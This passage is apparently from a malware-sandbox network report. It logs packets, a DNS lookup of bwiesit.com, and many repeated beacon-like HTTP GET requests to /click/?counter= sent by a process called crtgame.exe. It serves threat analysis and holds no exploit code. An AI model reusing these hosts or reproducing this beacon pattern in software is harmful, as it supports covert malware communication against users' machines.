                                                                            Dec 14, 2024 03:09:03.106157064 CET804991394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:09:03.106214046 CET4991380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:09:03.106214046 CET4990980192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:09:03.106534958 CET4991380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:09:03.226372004 CET804991394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:09:04.512526035 CET804991394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:09:04.512572050 CET804991394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:09:04.512597084 CET4991380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:09:04.512630939 CET4991380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:09:04.513292074 CET499152023192.168.2.446.8.225.74
                                                                            Dec 14, 2024 03:09:04.633497000 CET20234991546.8.225.74192.168.2.4
                                                                            Dec 14, 2024 03:09:04.633615971 CET499152023192.168.2.446.8.225.74
                                                                            Dec 14, 2024 03:09:04.633713961 CET499152023192.168.2.446.8.225.74
                                                                            Dec 14, 2024 03:09:04.753499031 CET20234991546.8.225.74192.168.2.4
                                                                            Dec 14, 2024 03:09:04.753632069 CET499152023192.168.2.446.8.225.74
                                                                            Dec 14, 2024 03:09:04.995285988 CET20234991546.8.225.74192.168.2.4
                                                                            Dec 14, 2024 03:09:05.903081894 CET20234991546.8.225.74192.168.2.4
                                                                            Dec 14, 2024 03:09:05.975047112 CET499152023192.168.2.446.8.225.74
                                                                            Dec 14, 2024 03:09:07.914593935 CET4991380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:09:07.915026903 CET4992380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:09:08.034971952 CET804991394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:09:08.035093069 CET4991380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:09:08.035115957 CET804992394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:09:08.035178900 CET4992380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:09:08.035353899 CET4992380192.168.2.494.232.249.187
                                                                            Dec 14, 2024 03:09:08.155071020 CET804992394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:09:09.444845915 CET804992394.232.249.187192.168.2.4
                                                                            Dec 14, 2024 03:09:09.445533991 CET4992380192.168.2.494.232.249.187
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 14, 2024 03:07:56.161679983 CET6079153192.168.2.445.155.250.90
                                                                            Dec 14, 2024 03:07:56.411474943 CET536079145.155.250.90192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 14, 2024 03:07:56.161679983 CET192.168.2.445.155.250.900xe3afStandard query (0)bwiesit.comA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 14, 2024 03:07:56.411474943 CET45.155.250.90192.168.2.40xe3afNo error (0)bwiesit.com94.232.249.187A (IP address)IN (0x0001)false
                                                                            • bwiesit.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.44973694.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:07:56.630903959 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:07:57.978707075 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:07:57 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370
                                                                            Dec 14, 2024 03:07:58.085033894 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:07:58.607819080 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:07:58 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.44973794.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:07:58.845885038 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:00.204941988 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:00 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.44974094.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:00.439666986 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:01.785357952 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:01 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.44974194.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:02.067209959 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:03.392119884 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:03 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.44974794.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:03.627127886 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:05.000874043 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:04 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.44975394.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:05.240509033 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:06.576967001 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:06 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.44975994.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:06.823694944 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:08.166342974 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:07 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370
                                                                            Dec 14, 2024 03:08:08.273379087 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:08.771872044 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:08 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370
                                                                            Dec 14, 2024 03:08:08.881850958 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:09.377691984 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:09 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.44976594.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:09.611638069 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:10.951509953 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:10 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.44977194.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:11.189832926 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:12.526029110 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:12 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370
                                                                            Dec 14, 2024 03:08:12.631575108 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:13.123840094 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:12 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.44977794.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:13.361428022 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:14.702039003 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:14 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.44977894.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:14.939625025 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:16.281989098 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:16 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.44978494.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:16.520201921 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:17.856797934 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:17 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.44979094.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:18.096235991 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:19.440357924 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:19 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.44979294.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:19.674396992 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:21.022746086 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:20 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370
                                                                            Dec 14, 2024 03:08:21.131854057 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:21.623733044 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:21 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.44979894.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:21.861186981 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:23.211982012 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:23 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370
                                                                            Dec 14, 2024 03:08:23.319390059 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:23.811348915 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:23 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.44980494.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:24.049947023 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:25.392980099 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:25 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.44980994.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:25.627547979 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:26.999140024 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:26 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
                                                                            Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: ede2ff49a2e11370


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.44981494.232.249.187802496C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 14, 2024 03:08:27.236995935 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf04f919ca HTTP/1.1
                                                                            Host: bwiesit.com
                                                                            User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                            Dec 14, 2024 03:08:28.580423117 CET220INHTTP/1.1 200 OK
                                                                            Server: nginx/1.20.1
                                                                            Date: Sat, 14 Dec 2024 02:08:28 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            X-Powered-By: PHP/7.4.33
